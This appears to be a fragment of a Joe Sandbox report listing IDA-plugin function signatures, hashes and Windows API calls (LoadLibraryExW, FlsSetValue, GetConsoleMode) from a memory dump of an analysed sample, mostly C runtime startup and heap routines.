                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1249254920-0
                                                                                                                                                                                                                • Opcode ID: f56c97781dd58d2aab377304fd46c3a154d589c5ff6358886a302790afab6230
                                                                                                                                                                                                                • Instruction ID: 2077bab015d42caa5de2b65517e06169b28d0d951831224a5912a304d58b894c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f56c97781dd58d2aab377304fd46c3a154d589c5ff6358886a302790afab6230
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD0C965E1AA06C6FB383B62AC1513D96E0BB5CB52FC4503ACA0F66760DD3C94AB8710
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocErrorFreeLast
                                                                                                                                                                                                                • String ID: Syst$emRo
                                                                                                                                                                                                                • API String ID: 796569475-2127360862
                                                                                                                                                                                                                • Opcode ID: 165de4f479d4a91bf291f81944976367129979d583b2d129c93f29d3d3a2abed
                                                                                                                                                                                                                • Instruction ID: 28c459c0806d1af7ec1c9a2de0b4cfec0e14ae2b5e059407c3bea6100ab5ac1b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 165de4f479d4a91bf291f81944976367129979d583b2d129c93f29d3d3a2abed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFB19E22E0969645FB14EB259A412BEE690AB4ABA4FC44D33DE5E477C5DE3CE443C320
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                • String ID: PATH$\
                                                                                                                                                                                                                • API String ID: 1010374628-1896636505
                                                                                                                                                                                                                • Opcode ID: f6fd6959d7f68e8fcbf405029f7cbb06076d842b06dfa883a0a39c5443146606
                                                                                                                                                                                                                • Instruction ID: b1a31c0f35ba60aa66cb845154c8e4f1adcb4834a952bc2d82eff02769495179
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6fd6959d7f68e8fcbf405029f7cbb06076d842b06dfa883a0a39c5443146606
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1291A021F0864245FB64BE658A512BDE6A4AF4A7B4FD44C37DE1E073C5DE3CE85382A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                • Opcode ID: 0aee2c9d0f18cba717c6b48c91b30045862c663ab1028652cf8fb080adae6bc7
                                                                                                                                                                                                                • Instruction ID: 657ad3764d250a250899b274627e1bfa54f0ff136656130c7405b70916e77b75
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aee2c9d0f18cba717c6b48c91b30045862c663ab1028652cf8fb080adae6bc7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AB17E73604B898BEB15DF29C84636C7BE0F744B59F988922DB5D837A4CB39D462C710
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 63a9441564c6a6f7ad47481ba519d67710061313537eb3387148ab9bda94a5b2
                                                                                                                                                                                                                • Instruction ID: 0b9d7708091057279796f5beeb126d306bbdc44bd9c0bfcf7d531c43002bf84c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63a9441564c6a6f7ad47481ba519d67710061313537eb3387148ab9bda94a5b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D051D622B0869199F710AB76E9402AEFBA1FB487E4FD44536EE5C67B95DF3CD0028710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                • Opcode ID: a9de5ba3fd7cfbb2cf2c222749f0b54522bbda6840c06eddc72199e7cf4c48a5
                                                                                                                                                                                                                • Instruction ID: 6a64feb306d39fc5ebf06df0a1a96c01753db65ab71cadcaf0229676925cf4ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9de5ba3fd7cfbb2cf2c222749f0b54522bbda6840c06eddc72199e7cf4c48a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9B09224E0BB02C2EA087B216C5221866E47F48742FC4813EC00D71320DF2C20B64720
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: 3bc380baf2909513d8a9c9c92a9fc896cd128b164f89aa194586654fdbad9b9d
                                                                                                                                                                                                                • Instruction ID: 9d98af338c81168623f17065721e2d788da71ba2e36fef2bc8464b52fe690905
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bc380baf2909513d8a9c9c92a9fc896cd128b164f89aa194586654fdbad9b9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0241BC22714A5586EF08DF2ADA1426DE7A1BB48FD4BC99437EE0D97B68DE3CD0438300
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c71b91569a50448bf070d4a20d718331527b6013442c525b41983b39e46376b6
                                                                                                                                                                                                                • Instruction ID: 3426b8c6d9aafb32345258335822972ad49ade5c9f5a491d6fe874abe653a912
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c71b91569a50448bf070d4a20d718331527b6013442c525b41983b39e46376b6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF049B27282554BD7A8AF28A4036297BD0F7043D5BD4443ED68D83E14DA3D90618F14
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: cf57e7cebe62e32071d2e79a6c6e283744fb2ccd3a5019868eb404209e5635eb
                                                                                                                                                                                                                • Instruction ID: e14a19f4bb10306d62b015e995a2f47ce5479af8fc03b5f14a64f202de2b4a98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf57e7cebe62e32071d2e79a6c6e283744fb2ccd3a5019868eb404209e5635eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAA0012691A90290E614AB10A950978A670BB58311BC04836C41D61864DE2CA5128320
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F2409
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F2417
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F2441
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F24AF
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F24BB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                • Opcode ID: c0e677ed793f07be15bbd36608866950c17eb8dc52562955832ce40533d26d5f
                                                                                                                                                                                                                • Instruction ID: 9dd28da57ddf722aacf3efe8f0f2b28a4e8dc1a917375cff8a35dea5dfca08ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0e677ed793f07be15bbd36608866950c17eb8dc52562955832ce40533d26d5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB317031B1A642A1EE21BB0699005BDE6D4BF48BB0FD94936DD2D4B794DE7CE8468220
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: 34f6f251a0c4e3579f44ea396bdba586a1f3d1e301c0d4045c909f7018b6911a
                                                                                                                                                                                                                • Instruction ID: c4bb92570a6483d6f299187bb7ee2fad892432eb804bded90b035cd1f31ed863
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f6f251a0c4e3579f44ea396bdba586a1f3d1e301c0d4045c909f7018b6911a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B217920B4D65282FA68B7319B411BDD1826F487B0FD44E3BED3E07BD6DE2CA4434620
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                • Opcode ID: 99da74fdfd8441b8e67a49d275e64181827fc904707b12b643c5eb1f68a84888
                                                                                                                                                                                                                • Instruction ID: ac61ebcdf42034c3bdc6d84795ec8816d78e64165417ecba0cdcb47d4f5f37c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99da74fdfd8441b8e67a49d275e64181827fc904707b12b643c5eb1f68a84888
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE11D621718B4186E350AB12E84432DBAE0FB88FE6FC04235EA5D93BA4CF3CD5658754
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F8717
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F874D
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F877A
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F878B
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F879C
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F87B7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: 4de0077a101ea52551fe941eda70405f4ff8b7a7846e0f5ccc5d3383e96223a6
                                                                                                                                                                                                                • Instruction ID: 7e61909cf77e51cee36345b7d96308e53620d3bad1095669970a80e70291b134
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4de0077a101ea52551fe941eda70405f4ff8b7a7846e0f5ccc5d3383e96223a6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA116A20A4D65282FA54B7715B812BDE2826F8C7B0FD44F36ED3E167D6DE2CA4834670
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,COMSPEC,?,?,?,?,00000000,00000000,00007FF7D77FED43,00000000), ref: 00007FF7D77FEE74
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,COMSPEC,?,?,?,?,00000000,00000000,00007FF7D77FED43,00000000), ref: 00007FF7D77FEEFF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                • String ID: COMSPEC
                                                                                                                                                                                                                • API String ID: 953036326-1631433037
                                                                                                                                                                                                                • Opcode ID: 05dd62fe37837f8303dbc443535fa8bb0844c069da3d2955d1cf2a6dd334d750
                                                                                                                                                                                                                • Instruction ID: e6483e7ac997951516345ce79609666de6c24de95faf5e4a5ffe2605a13a8e66
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05dd62fe37837f8303dbc443535fa8bb0844c069da3d2955d1cf2a6dd334d750
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0691B432A1865185F750AF2595402BDEBE0BB08BA8FD4493FDE4E67A94DF78E443C720
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                • Opcode ID: 614fdb69e2b955a1ba9290f5b6657808dc47bdef6ca2d0ebcf70e20f56212b4b
                                                                                                                                                                                                                • Instruction ID: 2dffb89a530cb3e5fe695b93f3eb902aaaa4b5566392d5f39cd3c051eda40466
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 614fdb69e2b955a1ba9290f5b6657808dc47bdef6ca2d0ebcf70e20f56212b4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2F06221B09A0281EB20AB24E84433DD7A0FF8A772FD4073BC96E555E4DF2CD456C720
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F87EF
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F880E
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F8836
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F8847
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F8858
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 31a2b18a2a523ff214017227f7d28ac857d9b5c6cbf883e8abd30d4b04b11b01
                                                                                                                                                                                                                • Instruction ID: 21dec0ddbb516aaba61953a552d48cd0c26f41ef610758e0df150a1b8dab4b8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31a2b18a2a523ff214017227f7d28ac857d9b5c6cbf883e8abd30d4b04b11b01
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80116A60E5965281FA58B335AA811BDE1925F483B0FC84B36ED3E167E6DE2CE4434620
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
